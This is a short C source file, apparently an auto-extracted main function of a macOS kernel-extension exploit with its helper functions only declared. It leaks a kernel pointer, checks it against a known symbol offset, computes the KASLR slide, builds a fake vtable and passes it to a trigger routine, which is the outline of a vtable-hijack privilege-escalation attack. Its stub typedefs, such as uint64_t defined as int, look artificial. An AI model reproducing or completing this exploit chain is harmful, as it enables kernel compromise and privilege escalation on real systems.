
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint64_t ;


 void* build_vtable (int,size_t*) ;
 int leak () ;
 int leaked_offset_in_kext () ;
 int load_addr () ;
 int printf (char*,...) ;
 int trigger (void*,size_t) ;

int main() {
  uint64_t leaked_ptr = leak();
  uint64_t kext_load_addr = load_addr();


  uint64_t offset = leaked_offset_in_kext();


  if ( (leaked_ptr & 0xfff) != (offset & 0xfff) ){
    printf("the leaked pointer doesn't match up with the expected symbol offset\n");
    return 1;
  }

  uint64_t kaslr_slide = (leaked_ptr - offset) - kext_load_addr;

  printf("kaslr slide: %p\n", kaslr_slide);

  size_t vtable_len = 0;
  void* vtable = build_vtable(kaslr_slide, &vtable_len);

  trigger(vtable, vtable_len);

  return 0;
}
